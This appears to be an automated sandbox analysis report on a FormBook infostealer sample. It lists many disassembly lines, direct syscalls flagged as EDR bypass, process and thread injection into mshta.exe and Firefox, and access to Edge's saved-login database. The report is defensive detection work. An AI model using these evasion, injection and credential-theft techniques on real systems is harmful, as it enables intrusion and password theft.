          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B892B mov eax, dword ptr fs:[00000030h]0_2_019B892B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A0946 mov eax, dword ptr fs:[00000030h]0_2_019A0946
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C4978 mov eax, dword ptr fs:[00000030h]0_2_019C4978
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C4978 mov eax, dword ptr fs:[00000030h]0_2_019C4978
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019AC97C mov eax, dword ptr fs:[00000030h]0_2_019AC97C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01946962 mov eax, dword ptr fs:[00000030h]0_2_01946962
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01946962 mov eax, dword ptr fs:[00000030h]0_2_01946962
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01946962 mov eax, dword ptr fs:[00000030h]0_2_01946962
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0196096E mov eax, dword ptr fs:[00000030h]0_2_0196096E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0196096E mov edx, dword ptr fs:[00000030h]0_2_0196096E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0196096E mov eax, dword ptr fs:[00000030h]0_2_0196096E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019AC89D mov eax, dword ptr fs:[00000030h]0_2_019AC89D
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01920887 mov eax, dword ptr fs:[00000030h]0_2_01920887
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E8C0 mov eax, dword ptr fs:[00000030h]0_2_0194E8C0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195C8F9 mov eax, dword ptr fs:[00000030h]0_2_0195C8F9
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195C8F9 mov eax, dword ptr fs:[00000030h]0_2_0195C8F9
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019EA8E4 mov eax, dword ptr fs:[00000030h]0_2_019EA8E4
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019AC810 mov eax, dword ptr fs:[00000030h]0_2_019AC810
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01942835 mov eax, dword ptr fs:[00000030h]0_2_01942835
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01942835 mov eax, dword ptr fs:[00000030h]0_2_01942835
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01942835 mov eax, dword ptr fs:[00000030h]0_2_01942835
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01942835 mov ecx, dword ptr fs:[00000030h]0_2_01942835
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01942835 mov eax, dword ptr fs:[00000030h]0_2_01942835
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01942835 mov eax, dword ptr fs:[00000030h]0_2_01942835
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195A830 mov eax, dword ptr fs:[00000030h]0_2_0195A830
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C483A mov eax, dword ptr fs:[00000030h]0_2_019C483A
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C483A mov eax, dword ptr fs:[00000030h]0_2_019C483A
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01950854 mov eax, dword ptr fs:[00000030h]0_2_01950854
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01924859 mov eax, dword ptr fs:[00000030h]0_2_01924859
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01924859 mov eax, dword ptr fs:[00000030h]0_2_01924859
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01932840 mov ecx, dword ptr fs:[00000030h]0_2_01932840
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019AE872 mov eax, dword ptr fs:[00000030h]0_2_019AE872
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019AE872 mov eax, dword ptr fs:[00000030h]0_2_019AE872
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B6870 mov eax, dword ptr fs:[00000030h]0_2_019B6870
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B6870 mov eax, dword ptr fs:[00000030h]0_2_019B6870
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930BBE mov eax, dword ptr fs:[00000030h]0_2_01930BBE
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930BBE mov eax, dword ptr fs:[00000030h]0_2_01930BBE
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D4BB0 mov eax, dword ptr fs:[00000030h]0_2_019D4BB0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D4BB0 mov eax, dword ptr fs:[00000030h]0_2_019D4BB0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CEBD0 mov eax, dword ptr fs:[00000030h]0_2_019CEBD0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01940BCB mov eax, dword ptr fs:[00000030h]0_2_01940BCB
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01940BCB mov eax, dword ptr fs:[00000030h]0_2_01940BCB
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01940BCB mov eax, dword ptr fs:[00000030h]0_2_01940BCB
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01920BCD mov eax, dword ptr fs:[00000030h]0_2_01920BCD
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01920BCD mov eax, dword ptr fs:[00000030h]0_2_01920BCD
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01920BCD mov eax, dword ptr fs:[00000030h]0_2_01920BCD
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01928BF0 mov eax, dword ptr fs:[00000030h]0_2_01928BF0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01928BF0 mov eax, dword ptr fs:[00000030h]0_2_01928BF0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01928BF0 mov eax, dword ptr fs:[00000030h]0_2_01928BF0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194EBFC mov eax, dword ptr fs:[00000030h]0_2_0194EBFC
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019ACBF0 mov eax, dword ptr fs:[00000030h]0_2_019ACBF0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199EB1D mov eax, dword ptr fs:[00000030h]0_2_0199EB1D
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199EB1D mov eax, dword ptr fs:[00000030h]0_2_0199EB1D
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199EB1D mov eax, dword ptr fs:[00000030h]0_2_0199EB1D
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199EB1D mov eax, dword ptr fs:[00000030h]0_2_0199EB1D
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199EB1D mov eax, dword ptr fs:[00000030h]0_2_0199EB1D
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199EB1D mov eax, dword ptr fs:[00000030h]0_2_0199EB1D
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199EB1D mov eax, dword ptr fs:[00000030h]0_2_0199EB1D
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199EB1D mov eax, dword ptr fs:[00000030h]0_2_0199EB1D
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199EB1D mov eax, dword ptr fs:[00000030h]0_2_0199EB1D
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194EB20 mov eax, dword ptr fs:[00000030h]0_2_0194EB20
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194EB20 mov eax, dword ptr fs:[00000030h]0_2_0194EB20
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019E8B28 mov eax, dword ptr fs:[00000030h]0_2_019E8B28
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019E8B28 mov eax, dword ptr fs:[00000030h]0_2_019E8B28
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CEB50 mov eax, dword ptr fs:[00000030h]0_2_019CEB50
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D4B4B mov eax, dword ptr fs:[00000030h]0_2_019D4B4B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D4B4B mov eax, dword ptr fs:[00000030h]0_2_019D4B4B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B6B40 mov eax, dword ptr fs:[00000030h]0_2_019B6B40
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B6B40 mov eax, dword ptr fs:[00000030h]0_2_019B6B40
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019EAB40 mov eax, dword ptr fs:[00000030h]0_2_019EAB40
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C8B42 mov eax, dword ptr fs:[00000030h]0_2_019C8B42
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191CB7E mov eax, dword ptr fs:[00000030h]0_2_0191CB7E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01958A90 mov edx, dword ptr fs:[00000030h]0_2_01958A90
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192EA80 mov eax, dword ptr fs:[00000030h]0_2_0192EA80
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192EA80 mov eax, dword ptr fs:[00000030h]0_2_0192EA80
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192EA80 mov eax, dword ptr fs:[00000030h]0_2_0192EA80
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192EA80 mov eax, dword ptr fs:[00000030h]0_2_0192EA80
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192EA80 mov eax, dword ptr fs:[00000030h]0_2_0192EA80
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192EA80 mov eax, dword ptr fs:[00000030h]0_2_0192EA80
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192EA80 mov eax, dword ptr fs:[00000030h]0_2_0192EA80
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192EA80 mov eax, dword ptr fs:[00000030h]0_2_0192EA80
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192EA80 mov eax, dword ptr fs:[00000030h]0_2_0192EA80
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019F4A80 mov eax, dword ptr fs:[00000030h]0_2_019F4A80
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01928AA0 mov eax, dword ptr fs:[00000030h]0_2_01928AA0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01928AA0 mov eax, dword ptr fs:[00000030h]0_2_01928AA0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01976AA4 mov eax, dword ptr fs:[00000030h]0_2_01976AA4
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01920AD0 mov eax, dword ptr fs:[00000030h]0_2_01920AD0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01954AD0 mov eax, dword ptr fs:[00000030h]0_2_01954AD0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01954AD0 mov eax, dword ptr fs:[00000030h]0_2_01954AD0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01976ACC mov eax, dword ptr fs:[00000030h]0_2_01976ACC
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01976ACC mov eax, dword ptr fs:[00000030h]0_2_01976ACC
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01976ACC mov eax, dword ptr fs:[00000030h]0_2_01976ACC
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195AAEE mov eax, dword ptr fs:[00000030h]0_2_0195AAEE
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195AAEE mov eax, dword ptr fs:[00000030h]0_2_0195AAEE
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019ACA11 mov eax, dword ptr fs:[00000030h]0_2_019ACA11
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01944A35 mov eax, dword ptr fs:[00000030h]0_2_01944A35
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01944A35 mov eax, dword ptr fs:[00000030h]0_2_01944A35
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195CA38 mov eax, dword ptr fs:[00000030h]0_2_0195CA38
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195CA24 mov eax, dword ptr fs:[00000030h]0_2_0195CA24
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194EA2E mov eax, dword ptr fs:[00000030h]0_2_0194EA2E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01926A50 mov eax, dword ptr fs:[00000030h]0_2_01926A50
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01926A50 mov eax, dword ptr fs:[00000030h]0_2_01926A50
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01926A50 mov eax, dword ptr fs:[00000030h]0_2_01926A50
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01926A50 mov eax, dword ptr fs:[00000030h]0_2_01926A50
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01926A50 mov eax, dword ptr fs:[00000030h]0_2_01926A50
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01926A50 mov eax, dword ptr fs:[00000030h]0_2_01926A50
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01926A50 mov eax, dword ptr fs:[00000030h]0_2_01926A50
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930A5B mov eax, dword ptr fs:[00000030h]0_2_01930A5B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930A5B mov eax, dword ptr fs:[00000030h]0_2_01930A5B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199CA72 mov eax, dword ptr fs:[00000030h]0_2_0199CA72
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199CA72 mov eax, dword ptr fs:[00000030h]0_2_0199CA72
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195CA6F mov eax, dword ptr fs:[00000030h]0_2_0195CA6F
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195CA6F mov eax, dword ptr fs:[00000030h]0_2_0195CA6F
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195CA6F mov eax, dword ptr fs:[00000030h]0_2_0195CA6F
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CEA60 mov eax, dword ptr fs:[00000030h]0_2_019CEA60
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195CDB1 mov ecx, dword ptr fs:[00000030h]0_2_0195CDB1
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195CDB1 mov eax, dword ptr fs:[00000030h]0_2_0195CDB1
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195CDB1 mov eax, dword ptr fs:[00000030h]0_2_0195CDB1
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01948DBF mov eax, dword ptr fs:[00000030h]0_2_01948DBF
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01948DBF mov eax, dword ptr fs:[00000030h]0_2_01948DBF
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019E8DAE mov eax, dword ptr fs:[00000030h]0_2_019E8DAE
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019E8DAE mov eax, dword ptr fs:[00000030h]0_2_019E8DAE

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtUnmapViewOfSection: Direct from: 0x77462D3CJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtClose: Direct from: 0x77462B6C
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeSection loaded: NULL target: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeSection loaded: NULL target: C:\Windows\SysWOW64\mshta.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: NULL target: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: NULL target: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\mshta.exeThread register set: target process: 5924Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\mshta.exeThread APC queued: target process: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: tIEQBQsFNUYr.exe, 00000002.00000002.3908739799.0000000001620000.00000002.00000001.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000002.00000000.1520270657.0000000001620000.00000002.00000001.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3913474021.00000000014C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: tIEQBQsFNUYr.exe, 00000002.00000002.3908739799.0000000001620000.00000002.00000001.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000002.00000000.1520270657.0000000001620000.00000002.00000001.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3913474021.00000000014C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: tIEQBQsFNUYr.exe, 00000002.00000002.3908739799.0000000001620000.00000002.00000001.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000002.00000000.1520270657.0000000001620000.00000002.00000001.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3913474021.00000000014C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
          Source: tIEQBQsFNUYr.exe, 00000002.00000002.3908739799.0000000001620000.00000002.00000001.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000002.00000000.1520270657.0000000001620000.00000002.00000001.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3913474021.00000000014C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.wavjjT3sEq.exe.120000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.3899264398.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.3911530315.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.3908871484.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1605691248.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3917330030.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.3911848031.0000000002BD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1606273875.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
